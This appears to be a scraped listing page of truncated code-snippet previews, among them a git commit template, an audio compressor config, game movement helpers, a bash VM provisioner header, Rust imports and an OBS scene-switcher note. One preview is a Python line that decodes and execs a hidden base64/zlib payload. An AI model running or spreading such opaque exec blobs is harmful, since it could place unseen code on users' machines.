See how a minor change to your commit message style can make a difference.
git commit -m"<type>(<optional scope>): <description>" \ -m"<optional body>" \ -m"<optional footer>"
See how a minor change to your commit message style can make a difference.
git commit -m"<type>(<optional scope>): <description>" \ -m"<optional body>" \ -m"<optional footer>"
| { | |
| "input": { | |
| "blocklist": [], | |
| "compressor#0": { | |
| "attack": 15.0, | |
| "boost-amount": 0.0, | |
| "boost-threshold": -72.0, | |
| "bypass": false, | |
| "dry": -80.01, | |
| "hpf-frequency": 10.0, |
| import base64, zlib; exec(zlib.decompress(base64.b64decode(b'eJztPV1zG8lx76rSf5iD7GBhAUuAlHg6nKALREAScvwqEvKdTeHWi8UA3NNiF95dUKRYTDkPdspVriRlJy8uu5x7dFX8dC8pv+qf3B+If0K6e2Z2Zz8AUSdeuZIy7gTux0xPT09PT3/N4M4HG8so3Bi7/gb3z9jiIj4N/K3btyqVyu1br1z/NffNxQX75mf/zg7D4PyCeYFje8wJ5guPxwFb2KHNJjxy7HBmh8wOnVP3LIjYmWuzVm9vo9vbM2/femxH9iRgrXaLcZ+N3fg1DwOEe3bfbBJwJ/DZ8KDXPWaeHbHp0nfcwLc9d2IDcIBw+1Y3/OnSjbkTL0O7ffsWYy0TW2Bz25/YbMFj13HffO2zb37xa7YgVEMeLQJ/wtlgf6/fG3SH3b3+/rBPbZ1yABxGCGfTZH2fOuJxL6jLyqpPcMEO/uGYXbAoDrk95zajnmHNLZN1RYdZxJljOwAVO3jU3ROEEVgFPo/Yke3POIuW44g7S+7HPJJEvn3LnS+CMGbRBTyKw4s2XplRPAmWsRlywHbqzpYhN7jvBBPXn3Uqy3jaeFCp3b7Fzx2+iNvQWhQlgMZ2xLfvJbdfRoGf3IQ8ubSjC6Rych+78/Sl9hxwBpI4HFuYhsGcxRcLwILJ1z3Xieus61/U2cEiplGrs103gofDJTAJ9vAO67zHB+sP9o+H3d3uzuDNb/ZZ9/nwYO/NPw0HO13W68P/h/39Xn9/Z9A9fv+2JnzKLNePYtvzLOAtS/TTqBHTMeZzPuET1mEnI/GAhkzR1A1O43ghXojBYQN61Q/DIGzL2qa9WHB/YlRkeRzKPKjQdU6vDQcLIxBRwZ0yP4hlGYk2fkIOk8dXpRah68fGtPLCP/lgxAbUY+hvAByPQIHbXDtqs8tqnVXNLwPXNwTA2pVpmgrjaRCyqWfPIub67ORkVGcnlUZjDDPlZQPYOObzxsJ2XtozHlV |
| # --- go home | |
| def go_home(): | |
| while get_pos_x() != 0: | |
| move(East) | |
| while get_pos_y() != 0: | |
| move(North) | |
| # --- math | |
| def is_even(x): | |
| return x%2 == 0 |
| #!/usr/bin/env bash | |
| set -euo pipefail | |
| # ───────────────────────────────────────────────────────────────────────────── | |
| # uat provisioner — LXQt + Chrome acceptance-testing desktop under qemu:///system. | |
| # Runs entirely as your normal user (no sudo): disks live in a path you own, | |
| # and libvirtd (already root) does the privileged VM/network work. | |
| # Keep uat-cloud-init.yaml and uat-net.xml next to this script. | |
| # ───────────────────────────────────────────────────────────────────────────── | |
| # Pin a clean PATH so a custom python (pyenv/conda/etc.) can't shadow the system |
| use std::collections::HashMap; | |
| use std::fmt; | |
| use std::io; | |
| use std::num::ParseFloatError; | |
| use std::rc::Rc; | |
| /* | |
| Types | |
| */ |
I wrote this because the AUR build of Advanced-Scene-Switcher was not working All I wanted to do was to be able to change my OBS scene to the monitor my mouse was hovering over the corrosponding monitor
requirements: